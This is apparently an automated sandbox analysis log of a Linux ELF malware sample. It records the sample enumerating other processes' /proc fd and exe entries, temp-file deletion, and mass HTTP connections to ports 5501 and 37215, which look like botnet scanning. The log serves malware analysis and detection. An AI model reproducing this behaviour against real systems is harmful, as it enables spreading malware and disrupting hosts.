              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/517/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2307/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/918/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/918/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/918/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/6243/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/6242/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1594/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1594/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2285/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2281/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1349/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1349/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1623/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1623/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/761/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/761/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/761/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1622/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1622/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/884/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/884/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/884/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1983/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1983/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2038/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2038/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1586/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1586/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1465/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1465/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1344/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1344/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1860/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1860/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1463/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1463/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2156/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/800/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/800/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/800/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/801/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/801/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/801/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1629/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1629/exeJump to behavior
              Source: /usr/bin/dash (PID: 6283)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bkLjVpPp7h /tmp/tmp.j2MlLX1DRY /tmp/tmp.x6vksjEfdZJump to behavior
              Source: /usr/bin/dash (PID: 6284)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bkLjVpPp7h /tmp/tmp.j2MlLX1DRY /tmp/tmp.x6vksjEfdZJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 60314 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46448 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 32808 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 38040 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45784 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55524 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59604 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45290 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 52750 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35712 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41784 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46666 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48136 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57120 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58566 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38720 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39580 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40120 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42096 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60018 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33178 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40520 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52782 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36922 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53652 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44446 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55416 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60928 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59834 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56098 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44568 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32944 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35366 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33460 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42154 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56644 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53768 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53136 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54544 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44478 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42374 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46362 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56394 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60982 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 38280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54136 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37782 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45616 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45232 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42788 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33708 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59312 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37604 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43248 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57754 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44720 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59534 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35604 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53012 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55892 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47994 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47420 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48740 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43866 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54484 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56300 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34740 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40130 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60250 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36364 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38670 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47132 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54462 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41438 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44140 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46390 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59858 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42292 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59578 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43406 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50918 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42682 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53678 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40266 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33810 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55438 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37042 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56832 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54994 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35742 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47002 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58902 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41698 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52482 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33724 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45482 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53262 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42510 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47092 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58880 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41474 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38036 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35796 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54372 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33158 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37918 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48696 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36000 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44840 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51126 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37628 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43972 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60012 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52516 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56974 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56338 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57308 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45312 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41032 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58176 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57746 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48364 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58970 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38838 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41720 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57564 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44112 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46902 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48624 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43132 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55652 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46242 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41292 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39226 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33634 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55176 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40616 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39174 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59938 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43446 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53614 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44932 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37294 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46212 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46820 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35954 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59342 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58688 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53956 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44872 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48788 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46628 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43780 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36618 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 52774 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58450 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51892 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35998 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39100 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36662 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58166 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35182 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40954 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43716 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59412 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36404 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48252 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54952 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44238 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34776 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36264 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 38380 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42496 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40324 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58712 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34704 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42658 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35592 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36158 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58426 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48992 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36670 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41964 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43426 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60900 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35012 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35520 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42540 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 38474 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33682 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48968 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60206 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47636 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44378 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42446 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35968 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44288 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36648 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51502 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54950 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34336 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 52482 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53932 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41548 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46628 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39950 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45814 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 49510 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59520 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40888 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55738 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 49392 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55736 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59632 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 49018 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59360 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48214 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36958 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51886 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55758 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53296 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56614 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 58898 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59864 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56640 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47080 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53638 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56140 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45892 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 44332 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39310 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47164 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36488 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33874 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34462 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33780 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43824 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45856 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53862 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 32826 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55794 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53956 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33454 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48894 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 40338 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59804 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 53584 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 51816 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35354 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55940 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34528 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48510 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48222 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 46070 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54914 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56748 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 59434 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39892 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 48658 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 56720 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60302 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35928 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33806 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 36362 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60770 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 43050 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33048 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 57336 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 33492 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37568 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 42964 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 35302 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47682 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41120 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47302 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 34484 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55030 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 54076 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 41742 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 47436 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 37036 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 55566 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60460 -> 5501
              Source: unknownNetwork traffic detected: HTTP traffic on port 60032 -> 5501
